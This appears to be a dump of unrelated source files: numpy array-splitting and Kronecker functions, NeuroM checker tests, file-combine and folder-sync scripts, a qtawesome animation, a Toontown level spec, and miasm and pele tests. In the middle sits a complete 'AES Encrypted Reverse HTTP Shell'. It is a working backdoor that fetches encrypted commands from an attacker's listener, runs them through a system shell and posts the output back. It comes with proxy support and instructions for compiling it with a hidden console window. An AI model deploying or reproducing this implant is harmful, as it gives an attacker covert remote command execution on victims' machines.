array([], dtype=float64)]
With a higher dimensional array the split is still along the second axis.
>>> x = np.arange(8.0).reshape(2, 2, 2)
>>> x
array([[[ 0., 1.],
[ 2., 3.]],
[[ 4., 5.],
[ 6., 7.]]])
>>> np.hsplit(x, 2)
[array([[[ 0., 1.]],
[[ 4., 5.]]]),
array([[[ 2., 3.]],
[[ 6., 7.]]])]
"""
if len(_nx.shape(ary)) == 0:
raise ValueError('hsplit only works on arrays of 1 or more dimensions')
if len(ary.shape) > 1:
return split(ary, indices_or_sections, 1)
else:
return split(ary, indices_or_sections, 0)
def vsplit(ary, indices_or_sections):
"""
Split an array into multiple sub-arrays vertically (row-wise).
Please refer to the ``split`` documentation. ``vsplit`` is equivalent
to ``split`` with `axis=0` (default), the array is always split along the
first axis regardless of the array dimension.
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(16.0).reshape(4, 4)
>>> x
array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[ 12., 13., 14., 15.]])
>>> np.vsplit(x, 2)
[array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.]]),
array([[ 8., 9., 10., 11.],
[ 12., 13., 14., 15.]])]
>>> np.vsplit(x, np.array([3, 6]))
[array([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.]]),
array([[ 12., 13., 14., 15.]]),
array([], dtype=float64)]
With a higher dimensional array the split is still along the first axis.
>>> x = np.arange(8.0).reshape(2, 2, 2)
>>> x
array([[[ 0., 1.],
[ 2., 3.]],
[[ 4., 5.],
[ 6., 7.]]])
>>> np.vsplit(x, 2)
[array([[[ 0., 1.],
[ 2., 3.]]]),
array([[[ 4., 5.],
[ 6., 7.]]])]
"""
if len(_nx.shape(ary)) < 2:
raise ValueError('vsplit only works on arrays of 2 or more dimensions')
return split(ary, indices_or_sections, 0)
def dsplit(ary, indices_or_sections):
"""
Split array into multiple sub-arrays along the 3rd axis (depth).
Please refer to the `split` documentation. `dsplit` is equivalent
to `split` with ``axis=2``, the array is always split along the third
axis provided the array dimension is greater than or equal to 3.
See Also
--------
split : Split an array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(16.0).reshape(2, 2, 4)
>>> x
array([[[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.]],
[[ 8., 9., 10., 11.],
[ 12., 13., 14., 15.]]])
>>> np.dsplit(x, 2)
[array([[[ 0., 1.],
[ 4., 5.]],
[[ 8., 9.],
[ 12., 13.]]]),
array([[[ 2., 3.],
[ 6., 7.]],
[[ 10., 11.],
[ 14., 15.]]])]
>>> np.dsplit(x, np.array([3, 6]))
[array([[[ 0., 1., 2.],
[ 4., 5., 6.]],
[[ 8., 9., 10.],
[ 12., 13., 14.]]]),
array([[[ 3.],
[ 7.]],
[[ 11.],
[ 15.]]]),
array([], dtype=float64)]
"""
if len(_nx.shape(ary)) < 3:
raise ValueError('dsplit only works on arrays of 3 or more dimensions')
return split(ary, indices_or_sections, 2)
def get_array_prepare(*args):
"""Find the wrapper for the array with the highest priority.
In case of ties, leftmost wins. If no wrapper is found, return None
"""
wrappers = sorted((getattr(x, '__array_priority__', 0), -i,
x.__array_prepare__) for i, x in enumerate(args)
if hasattr(x, '__array_prepare__'))
if wrappers:
return wrappers[-1][-1]
return None
def get_array_wrap(*args):
"""Find the wrapper for the array with the highest priority.
In case of ties, leftmost wins. If no wrapper is found, return None
"""
wrappers = sorted((getattr(x, '__array_priority__', 0), -i,
x.__array_wrap__) for i, x in enumerate(args)
if hasattr(x, '__array_wrap__'))
if wrappers:
return wrappers[-1][-1]
return None
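# For illustration (not part of this module's API): with a = np.array([1., 2.])
# and m = np.matrix([[1., 2.]]), get_array_wrap(a, m) returns m.__array_wrap__,
# because np.matrix sets a higher __array_priority__ than a plain ndarray; with
# equal priorities the leftmost argument wins.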
def kron(a, b):
"""
Kronecker product of two arrays.
Computes the Kronecker product, a composite array made of blocks of the
second array scaled by the first.
Parameters
----------
a, b : array_like
Returns
-------
out : ndarray
See Also
--------
outer : The outer product
Notes
-----
The function assumes that the number of dimensions of `a` and `b`
    are the same, prepending ones to the shape of the smaller one if necessary.
If `a.shape = (r0,r1,..,rN)` and `b.shape = (s0,s1,...,sN)`,
    the Kronecker product has shape `(r0*s0, r1*s1, ..., rN*sN)`.
The elements are products of elements from `a` and `b`, organized
explicitly by::
kron(a,b)[k0,k1,...,kN] = a[i0,i1,...,iN] * b[j0,j1,...,jN]
where::
kt = it * st + jt, t = 0,...,N
In the common 2-D case (N=1), the block structure can be visualized::
[[ a[0,0]*b, a[0,1]*b, ... , a[0,-1]*b ],
[ ... ... ],
[ a[-1,0]*b, a[-1,1]*b, ... , a[-1,-1]*b ]]
Examples
--------
>>> np.kron([1,10,100], [5,6,7])
array([ 5, 6, 7, 50, 60, 70, 500, 600, 700])
>>> np.kron([5,6,7], [1,10,100])
array([ 5, 50, 500, 6, 60, 600, 7, 70, 700])
>>> np.kron(np.eye(2), np.ones((2,2)))
array([[ 1., 1., 0., 0.],
[ 1., 1., 0., 0.],
[ 0., 0., 1., 1.],
[ 0., 0., 1., 1.]])
>>> a = np.arange(100).reshape((2,5,2,5))
>>> b = np.arange(24).reshape((2,3,4))
>>> c = np.kron(a,b)
>>> c.shape
(2, 10, 6, 20)
>>> I = (1,3,0,2)
>>> J = (0,2,1)
>>> J1 = (0,) + J # extend to ndim=4
>>> S1 = (1,) + b.shape
>>> K = tuple(np.array(I) * np.array(S1) + np.array(J1))
>>> c[K] == a[I]*b[J]
True
"""
b = asanyarray(b)
a = array(a, copy=False, subok=True, ndmin=b.ndim)
ndb, nda = b.ndim, a.ndim
if (nda == 0 or ndb == 0):
return _nx.multiply(a, b)
as_ = a.shape
bs = b.shape
if not a.flags.contiguous:
a = reshape(a, as_)
if not b.flags.contiguous:
b = reshape(b, bs)
nd = ndb
if (ndb != nda):
if (ndb > nda):
as_ = (1,)*(ndb-nda) + as_
else:
bs = (1,)*(nda-ndb) + bs
nd = nda
result = outer(a, b).reshape(as_+bs)
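    # outer(a, b) holds every pairwise product; after reshaping it to as_ + bs,
    # each concatenate() pass below merges the current leading r-axis into the
    # matching s-axis, so axis t of the final result has length
    # a.shape[t] * b.shape[t] (in terms of the padded shapes as_ and bs).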
axis = nd-1
for _ in range(nd):
result = concatenate(result, axis=axis)
wrapper = get_array_prepare(a, b)
if wrapper is not None:
result = wrapper(result)
wrapper = get_array_wrap(a, b)
if wrapper is not None:
result = wrapper(result)
return result
def tile(A, reps):
"""
Construct an array by repeating A the number of times given by reps.
If `reps` has length ``d``, the result will have dimension of
``max(d, A.ndim)``.
If ``A.ndim < d``, `A` is promoted to be d-dimensional by prepending new
axes. So a shape (3,) array is promoted to (1, 3) for 2-D replication,
or shape (1, 1, 3) for 3-D replication. If this is not the desired
behavior, promote `A` to d-dimensions manually before calling this
function.
If ``A.ndim > d``, `reps` is promoted to `A`.ndim by pre-pending 1's to it.
Thus for an `A` of shape (2, 3, 4, 5), a `reps` of (2, 2) is treated as
(1, 1, 2, 2).
Parameters
----------
A : array_like
The input array.
reps : array_like
The number of repetitions of `A` along each axis.
Returns
-------
c : ndarray
The tiled output array.
See Also
--------
repeat : Repeat elements of an array.
Examples
--------
>>> a = np.array([0, 1, 2])
>>> np.tile(a, 2)
array([0, 1, 2, 0, 1, 2])
>>> np.tile(a, (2, 2))
array([[0, 1, 2, 0, 1, 2],
[0, 1, 2, 0, 1, 2]])
>>> np.tile(a, (2, 1, 2))
array([[[0, 1, 2, 0, 1, 2]],
[[0, 1, 2, 0, 1, 2]]])
>>> b = np.array([[1, 2], [3, 4]])
>>> np.tile(b, 2)
array([[1, 2, 1, 2],
[3, 4, 3, 4]])
>>> np.tile(b, (2, 1))
array([[1, 2],
[3, 4],
[1, 2],
[3, 4]])
"""
try:
tup = tuple(reps)
except TypeError:
tup = (reps,)
d = len(tup)
if all(x == 1 for x in tup) and isinstance(A, _nx.ndarray):
# Fixes the problem that the function does not make a copy if A is a
# numpy array and the repetitions are 1 in all dimensions
return _nx.array(A, copy=True, subok=True, ndmin=d)
else:
# Note that no copy of zero-sized arrays is made. However since they
# have no data there is no risk of an inadvertent overwrite.
c = _nx.array(A, copy=False, subok=True, ndmin=d)
if (d < c.ndim):
tup = (1,)*(c.ndim-d) + tup
shape_out = tuple(s*t for s, t in zip(c.shape, tup))
n = c.size
if n > 0:
for dim_in, nrep in zip(c.shape, tup):
if nrep != 1:
c = c.reshape(-1, n).repeat(nrep, 0)
n //= dim_in
return c.reshape(shape_out)
| WillieMaddox/numpy | numpy/lib/shape_base.py | Python | bsd-3-clause | 25,222 |
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
from copy import copy
from nose import tools as nt
from neurom.check.runner import CheckRunner
from neurom.exceptions import ConfigError
_path = os.path.dirname(os.path.abspath(__file__))
SWC_PATH = os.path.join(_path, '../../../test_data/swc/')
NRN_PATH_0 = os.path.join(SWC_PATH, 'Neuron.swc')
NRN_PATH_1 = os.path.join(SWC_PATH, 'Neuron_zero_length_sections.swc')
NRN_PATH_2 = os.path.join(SWC_PATH, 'Single_apical.swc')
NRN_PATH_3 = os.path.join(SWC_PATH, 'Single_basal.swc')
NRN_PATH_4 = os.path.join(SWC_PATH, 'Single_axon.swc')
NRN_PATH_5 = os.path.join(SWC_PATH, 'Single_apical_no_soma.swc')
CONFIG = {
'checks': {
'structural_checks': [
'is_single_tree',
'has_soma_points',
'has_sequential_ids',
'has_increasing_ids',
'has_valid_soma',
'has_valid_neurites'
],
'neuron_checks': [
'has_basal_dendrite',
'has_axon',
'has_apical_dendrite',
'has_all_nonzero_segment_lengths',
'has_all_nonzero_section_lengths',
'has_all_nonzero_neurite_radii',
'has_nonzero_soma_radius'
]
},
'options': {
'has_nonzero_soma_radius': 0.0,
"has_all_nonzero_neurite_radii": 0.007,
"has_all_nonzero_segment_lengths": 0.01,
"has_all_nonzero_section_lengths": [0.01]
},
}
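# The keys under 'options' name individual checks; each value appears to supply
# the extra argument(s) (thresholds/tolerances) passed to that check.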
CONFIG_COLOR = copy(CONFIG)
CONFIG_COLOR['color'] = True
REF_0 = {
'files': {
NRN_PATH_0: {
"Is single tree": True,
"Has soma points": True,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": True,
"Has valid neurites": True,
"Has basal dendrite": True,
"Has axon": True,
"Has apical dendrite": True,
"Has all nonzero segment lengths": True,
"Has all nonzero section lengths": True,
"Has all nonzero neurite radii": True,
"Has nonzero soma radius": True,
"ALL": True
}
},
"STATUS": "PASS"
}
REF_1 = {
'files': {
NRN_PATH_1: {
"Is single tree": True,
"Has soma points": True,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": True,
"Has valid neurites": True,
"Has basal dendrite": True,
"Has axon": True,
"Has apical dendrite": True,
"Has all nonzero segment lengths": False,
"Has all nonzero section lengths": False,
"Has all nonzero neurite radii": True,
"Has nonzero soma radius": True,
"ALL": False
}
},
"STATUS": "FAIL"
}
REF_2 = {
'files': {
NRN_PATH_2: {
"Is single tree": True,
"Has soma points": True,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": True,
"Has valid neurites": True,
"Has basal dendrite": False,
"Has axon": False,
"Has apical dendrite": True,
"Has all nonzero segment lengths": False,
"Has all nonzero section lengths": True,
"Has all nonzero neurite radii": True,
"Has nonzero soma radius": True,
"ALL": False
}
},
"STATUS": "FAIL"
}
REF_3 = {
'files': {
NRN_PATH_3: {
"Is single tree": True,
"Has soma points": True,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": True,
"Has valid neurites": True,
"Has basal dendrite": True,
"Has axon": False,
"Has apical dendrite": False,
"Has all nonzero segment lengths": False,
"Has all nonzero section lengths": True,
"Has all nonzero neurite radii": True,
"Has nonzero soma radius": False,
"ALL": False
}
},
"STATUS": "FAIL"
}
REF_4 = {
'files': {
NRN_PATH_4: {
"Is single tree": True,
"Has soma points": True,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": True,
"Has valid neurites": True,
"Has basal dendrite": False,
"Has axon": True,
"Has apical dendrite": False,
"Has all nonzero segment lengths": False,
"Has all nonzero section lengths": True,
"Has all nonzero neurite radii": True,
"Has nonzero soma radius": True,
"ALL": False
}
},
"STATUS": "FAIL"
}
REF_5 = {
'files': {
NRN_PATH_5: {
"Is single tree": True,
"Has soma points": False,
"Has sequential ids": True,
"Has increasing ids": True,
"Has valid soma": False,
"Has valid neurites": False,
"ALL": False
}
},
"STATUS": "FAIL"
}
def test_ok_neuron():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_0)
nt.assert_equal(summ, REF_0)
def test_ok_neuron_color():
checker = CheckRunner(CONFIG_COLOR)
summ = checker.run(NRN_PATH_0)
nt.assert_equal(summ, REF_0)
def test_zero_length_sections_neuron():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_1)
nt.assert_equal(summ, REF_1)
def test_single_apical_neuron():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_2)
nt.assert_equal(summ, REF_2)
def test_single_basal_neuron():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_3)
nt.assert_equal(summ, REF_3)
def test_single_axon_neuron():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_4)
nt.assert_equal(summ, REF_4)
def test_single_apical_no_soma():
checker = CheckRunner(CONFIG)
summ = checker.run(NRN_PATH_5)
nt.assert_equal(summ, REF_5)
def test_directory_input():
checker = CheckRunner(CONFIG)
summ = checker.run(SWC_PATH)
nt.eq_(summ['files'][NRN_PATH_0]['Has axon'], True)
nt.eq_(summ['files'][NRN_PATH_2]['Has axon'], False)
@nt.raises(IOError)
def test_invalid_data_path_raises_IOError():
checker = CheckRunner(CONFIG)
_ = checker.run('foo/bar/baz')
def test__sanitize_config():
# fails if missing 'checks'
nt.assert_raises(ConfigError, CheckRunner._sanitize_config, {})
# creates minimal config
new_config = CheckRunner._sanitize_config({'checks': {}})
nt.eq_(new_config, {'checks':
{'structural_checks': [],
'neuron_checks': [],
},
'options': {},
'color': False,
})
# makes no changes to already filled out config
new_config = CheckRunner._sanitize_config(CONFIG)
nt.eq_(CONFIG, new_config)
| eleftherioszisis/NeuroM | neurom/check/tests/test_runner.py | Python | bsd-3-clause | 8,711 |
import numpy as np
import glob
dir2data = "/Volumes/HGST5/APS1504_AlCu/recon/D_Coarsening_2/recon_2/"
prefix = "recon_"
dir2out = "/Volumes/HGST5/APS1504_AlCu/recon/D_Coarsening_2/combine_test/"
flist = glob.glob(dir2data+prefix+"*.bin")
def parse_filename(filename):
t, z = filename.split('.')[0].split('_')[-3::2]
return int(t), int(z)
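# Slice files are assumed to follow the <prefix>t_<t>_z_<z>.bin naming used by
# the write-out loop below, e.g. "recon_t_5_z_12.bin" parses to (5, 12).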
fdict = {}
for f in flist:
t, z = parse_filename(f)
try:
fdict[t].append(z)
except KeyError:
fdict[t] = [z]
for t, zlist in fdict.items():
out_name = dir2out+prefix+"t_%d.bin" % t
print("Opening output file %s" % out_name)
fout = open(out_name, 'wb')
for z in sorted(zlist):
data_name = dir2data+prefix+"t_%d_z_%d.bin" % (t, z)
print("Reading data file %s" % data_name)
fin = open(data_name, 'rb')
fout.write(fin.read())
fin.close()
fout.close()
| decarlof/timbir | doc/collection/APS_32ID/non-interlaced/combine_bin.py | Python | bsd-3-clause | 889 |
#!/usr/bin/env python
""" Sincronizarea a doua directoare """
import os
import time
import shutil
# pylint: disable=too-many-locals
# pylint: disable=global-statement
OLD_FILESET = dict()
def copyfile(src, dest):
""" Copiaza fisiere cu metadate """
destinatie = os.path.split(dest)
dest = destinatie[0]
if not os.path.exists(dest):
os.makedirs(dest)
shutil.copy2(src, dest)
def get_fileset(path):
""" Construieste lista de fisiere din directorul dat si din subdirectoare,
cu data ultimei moficari """
fileset = dict()
for root, _, files in list(os.walk(path)):
if not os.path.islink(root):
for fname in files:
cfil = os.path.join(os.path.relpath(root, path), fname)
fileset[cfil] = int(os.path.getmtime(os.path.join(path, cfil)))
return fileset
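# Illustrative shape of the returned mapping (paths relative to `path`):
# {'./notes.txt': 1589000000, 'sub/report.pdf': 1589000123}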
def sync_folders(folder1, folder2):
""" Functia de sincronizare a directoarelor """
fileset1 = get_fileset(folder1)
files1 = set(fileset1.keys())
fileset2 = get_fileset(folder2)
files2 = set(fileset2.keys())
total_files = files1.union(files2)
common_files = files1.intersection(files2)
ch_comm_files = {o for o in common_files if fileset1[o] != fileset2[o]}
ch_fs1_files = {o for o in ch_comm_files if fileset1[o] > fileset2[o]}
ch_fs2_files = {o for o in ch_comm_files if fileset2[o] > fileset1[o]}
files_only_in_set1 = total_files - files2
files_only_in_set2 = total_files - files1
deleted_set1 = files_only_in_set2.intersection(set(OLD_FILESET.keys()))
deleted_set2 = files_only_in_set1.intersection(set(OLD_FILESET.keys()))
new_files_in_set1 = files_only_in_set1 - deleted_set2
new_files_in_set2 = files_only_in_set2 - deleted_set1
for fisier in new_files_in_set1.union(ch_fs1_files):
copyfile(os.path.join(folder1, fisier), os.path.join(folder2, fisier))
print "se copiaza 1->2 ", fisier
for fisier in new_files_in_set2.union(ch_fs2_files):
copyfile(os.path.join(folder2, fisier), os.path.join(folder1, fisier))
print "se copiaza 2->1 ", fisier
for fisier in deleted_set1:
os.remove(os.path.join(folder2, fisier))
print "se sterge din 2 ", fisier
for fisier in deleted_set2:
os.remove(os.path.join(folder1, fisier))
print "se sterge din 1 ", fisier
def main():
""" Sincronizeaza 2 directoare """
global OLD_FILESET
folder1 = "/home/iulian/Desktop/testSync/A"
folder2 = "/home/iulian/Desktop/testSync/B"
interval_sincronizare = 10 # sec
while 1:
sync_folders(folder1, folder2)
OLD_FILESET = get_fileset(folder1)
time.sleep(interval_sincronizare)
if __name__ == "__main__":
main()
| c-square/python-lab | python/solutii/iulian_bute/sync.py | Python | mit | 2,742 |
from qtpy.QtCore import QTimer
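# Animation helpers used while painting an icon: Spin rotates the painter
# around the icon centre by `step` degrees every `interval` milliseconds,
# and Pulse (below) is a Spin that jumps in 45-degree steps every 300 ms.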
class Spin:
def __init__(self, parent_widget, interval=10, step=1):
self.parent_widget = parent_widget
self.interval, self.step = interval, step
self.info = {}
def _update(self, parent_widget):
if self.parent_widget in self.info:
timer, angle, step = self.info[self.parent_widget]
if angle >= 360:
angle = 0
angle += step
self.info[parent_widget] = timer, angle, step
parent_widget.update()
def setup(self, icon_painter, painter, rect):
if self.parent_widget not in self.info:
timer = QTimer()
timer.timeout.connect(lambda: self._update(self.parent_widget))
self.info[self.parent_widget] = [timer, 0, self.step]
timer.start(self.interval)
else:
timer, angle, self.step = self.info[self.parent_widget]
x_center = rect.width() * 0.5
y_center = rect.height() * 0.5
painter.translate(x_center, y_center)
painter.rotate(angle)
painter.translate(-x_center, -y_center)
class Pulse(Spin):
def __init__(self, parent_widget):
Spin.__init__(self, parent_widget, interval=300, step=45)
| daodaoliang/qtawesome | qtawesome/animation.py | Python | mit | 1,284 |
from toontown.coghq.SpecImports import *
GlobalEntities = {1000: {'type': 'levelMgr',
'name': 'LevelMgr',
'comment': '',
'parentEntId': 0,
'cogLevel': 0,
'farPlaneDistance': 1500,
'modelFilename': 'phase_12/models/bossbotHQ/BossbotGreenRoom_A',
'wantDoors': 1},
1001: {'type': 'editMgr',
'name': 'EditMgr',
'parentEntId': 0,
'insertEntity': None,
'removeEntity': None,
'requestNewEntity': None,
'requestSave': None},
0: {'type': 'zone',
'name': 'UberZone',
'comment': '',
'parentEntId': 0,
'scale': 1,
'description': '',
'visibility': []},
110301: {'type': 'door',
'name': '<unnamed>',
'comment': '',
'parentEntId': 110303,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1,
'color': Vec4(1, 1, 1, 1),
'isLock0Unlocked': 1,
'isLock1Unlocked': 0,
'isLock2Unlocked': 1,
'isLock3Unlocked': 1,
'isOpen': 0,
'isOpenEvent': 0,
'isVisBlocker': 0,
'secondsOpen': 1,
'unlock0Event': 0,
'unlock1Event': 110302,
'unlock2Event': 0,
'unlock3Event': 0},
110302: {'type': 'golfGreenGame',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1,
'cellId': 0,
'puzzleBase': 3,
'puzzlePerPlayer': 1,
'switchId': 0,
'timeToPlay': 120},
10002: {'type': 'nodepath',
'name': 'props',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
110303: {'type': 'nodepath',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(40.9635, 2, 0),
'hpr': Vec3(270, 0, 0),
'scale': Vec3(1, 1, 1)}}
Scenario0 = {}
levelSpec = {'globalEntities': GlobalEntities,
'scenarios': [Scenario0]}
| ksmit799/Toontown-Source | toontown/coghq/BossbotCountryClubGreenRoom_Action00.py | Python | mit | 2,122 |
#! /usr/bin/env python
from asm_test import Asm_Test
class Test_PUSHPOP(Asm_Test):
TXT = '''
main:
MOV EBP, ESP
PUSH 0x11223344
POP EAX
CMP EBP, ESP
JNZ BAD
PUSHW 0x1122
POPW AX
CMP EBP, ESP
JNZ BAD
PUSH SS
POP EAX
CMP EBP, ESP
JNZ BAD
PUSHW SS
POPW AX
CMP EBP, ESP
JNZ BAD
PUSHFD
POP EAX
CMP EBP, ESP
JNZ BAD
PUSHFW
POPW AX
CMP EBP, ESP
JNZ BAD
PUSH EAX
POPFD
CMP EBP, ESP
JNZ BAD
PUSHW AX
POPFW
CMP EBP, ESP
JNZ BAD
RET
BAD:
INT 0x3
RET
'''
def check(self):
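        # main() copied the initial ESP into EBP; after every PUSH has been
        # matched by a POP, the final RET pops the return address as well,
        # so ESP should end up exactly 4 bytes above EBP.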
assert(self.myjit.cpu.ESP-4 == self.myjit.cpu.EBP)
if __name__ == "__main__":
[test()() for test in [Test_PUSHPOP]]
| amohanta/miasm | test/arch/x86/unit/mn_stack.py | Python | gpl-2.0 | 977 |
#!/usr/bin/python
##########################################################################################################################
#
#
# AES Encrypted Reverse HTTP Shell by:
#
# Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
##########################################################################################################################
#
##########################################################################################################################
#
# To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules
# to make it easier. Can download from here:
# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip
#
##########################################################################################################################
#
# This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc.
#
##########################################################################################################################
#
##########################################################################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
#
###########################################################################################################################
import urllib
import urllib2
import httplib
import subprocess
import sys
import base64
import os
from Crypto.Cipher import AES
# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to encrypt/encode and decrypt/decode a string
# encrypt with AES, encode with base64
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
# secret key, change this if you want to be unique
secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2"
# create a cipher object using the random secret
cipher = AES.new(secret)
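# Illustrative round trip with the helpers above (assumes pyCrypto is present):
# EncodeAES(cipher, "whoami") returns the base64 of AES(pad("whoami")), and
# DecodeAES(cipher, EncodeAES(cipher, "whoami")) yields "whoami" again.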
# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxyinfo:80"
# USERNAME FOR THE PROXY
USERNAME = "username"
# PASSWORD FOR THE PROXY
PASSWORD = "password"
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS',
uri=PROXY_URL, # PROXY SPECIFIED ABOVE
user=USERNAME, # USERNAME SPECIFIED ABOVE
passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
try:
# our reverse listener ip address
address = sys.argv[1]
# our reverse listener port address
port = sys.argv[2]
# handle the case where no parameters were passed
except IndexError:
print " \nAES Encrypted Reverse HTTP Shell by:"
print " Dave Kennedy (ReL1K)"
print " http://www.secmaniac.com"
print "Usage: shell.exe <reverse_ip_address> <port>"
sys.exit()
# loop forever
while 1:
    # open up our request handler
req = urllib2.Request('http://%s:%s' % (address,port))
# grab our response which contains what command we want
message = urllib2.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
message = DecodeAES(cipher, message)
# quit out if we receive that command
if message == "quit" or message == "exit":
sys.exit()
# issue the shell command we want
proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
data = EncodeAES(cipher, data)
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
    data = urllib.urlencode({'cmd': data})
# who we want to connect back to with the shell
h = httplib.HTTPConnection('%s:%s' % (address,port))
# set our basic headers
headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)
| firebitsbr/raspberry_pwn | src/pentest/revshells/encrypted_http_shell/shell.py | Python | gpl-3.0 | 5,129 |
from __future__ import division
import unittest
import os
import logging
import numpy as np
from pele.potentials import _inversepower_cpp
from pele.optimize._quench import lbfgs_cpp
import _base_test
def read_xyzdr(fname, bdim=3):
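    """Read an .xyzdr file: one line per sphere holding x y z diameter rattler.
    Returns (coords, radii, rattlers); radii are half the stored diameters and
    the rattler flag is repeated bdim times, once per coordinate component.
    """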
coords = []
radii = []
rattlers = []
f = open(fname, "r")
while True:
xyzdr = f.readline()
if not xyzdr: break
x, y, z, d, r = xyzdr.split()
coords.extend([float(x), float(y), float(z)])
radii.extend([float(d) / 2])
for _ in xrange(bdim):
rattlers.extend([float(r)])
return np.array(coords), np.array(radii), np.array(rattlers)
def minimize(coords, pot):
result = lbfgs_cpp(coords, pot)
# result = modifiedfire_cpp(coords, pot)
return result.coords, result.energy, result.grad, result.rms
class TestInversePower_CPP(_base_test._BaseTest):
def setUp(self):
current_dir = os.path.dirname(__file__)
xyz, hs_radii, rattlers = read_xyzdr(current_dir + "/_hswca20_min2.xyzdr")
sca = 0.205071132088
radii = hs_radii * (1.0 + sca)
boxv = np.array([6.26533756282, 6.26533756282, 6.26533756282])
pow = 4
eps = 1
self.pot = _inversepower_cpp.InversePower(pow, eps, radii, boxvec=boxv)
self.natoms = 20
result = minimize(xyz, self.pot)
self.xmin = result[0] # xyz
self.Emin = result[1] # self.pot.getEnergy(self.xmin)
print self.Emin
self.xrandom = np.random.uniform(-1, 1, len(xyz)) * 1e-2
if __name__ == "__main__":
logging.basicConfig(filename='hs_wca_cpp.log', level=logging.DEBUG)
unittest.main() | kjs73/pele | pele/potentials/tests/test_inversepower_cpp.py | Python | gpl-3.0 | 1,652 |
#!/usr/bin/env python
#
# Copyright 2007,2010 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
